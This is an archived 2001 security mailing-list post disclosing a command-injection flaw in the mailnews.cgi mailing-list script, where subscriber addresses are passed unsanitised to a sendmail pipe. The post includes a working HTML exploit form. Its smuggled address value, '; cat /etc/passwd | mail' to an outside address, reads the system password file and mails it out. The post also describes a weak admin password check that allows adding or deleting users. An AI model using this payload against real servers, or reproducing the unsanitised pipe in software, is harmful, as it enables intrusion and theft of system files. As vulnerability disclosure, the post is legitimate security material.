OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Kanedaaa Bohater (kanedaAC.PL)
Date: Sun Feb 18 2001 - 16:04:54 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hello BuGReaders...

    ##Script: mailnews.cgi

    ##Introduction:

    <cat from source>
    CGI-Script MAILNEWS 1.3
    This script helps you to maintain a mailinglist.
    </cat>

    ##Tested Version: 1.1, 1.3

    Author dont parse some characters and he use very stupid "password
    protection". We can add or delete users from maillist without known
    admin password. But this is small problem ;] . Lets see what we can do
    more.
    <cat source>
            open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
    </cat>
    where $mailprog [default] is sendmail and $member is users from usersfile.
    Now we can do something like this. Add user "; cat /etc/passwd | mail
    adammalysz.pl' and use subroutine to execute this code :]

    Simple exploit in html:

    <HTML>
    <BODY>
    <FORM
    ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
    <INPUT type=hidden NAME="action" value="subscribe">
    <BR>
    User to add with ; [ex:" ; cat /etc/passwd |mail adammalysz.pl"
    without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT">
    <INPUT TYPE="SUBMIT" VALUE="Submit">
    </FORM>
    <BR>
    <A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
    Execute command :] </A>
    <CENTER> Peace... </CENTER>
    </BODY>
    </HTML>

    Who : Kanedaaa
            kanedaac.pl

    ***$$$### " I moze bardzo wielu nie zrozumie tych slow...
                    Ale nie ma litosci dla SKURWYSYNOW .... " ###$$*
    kanedaac.pl Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..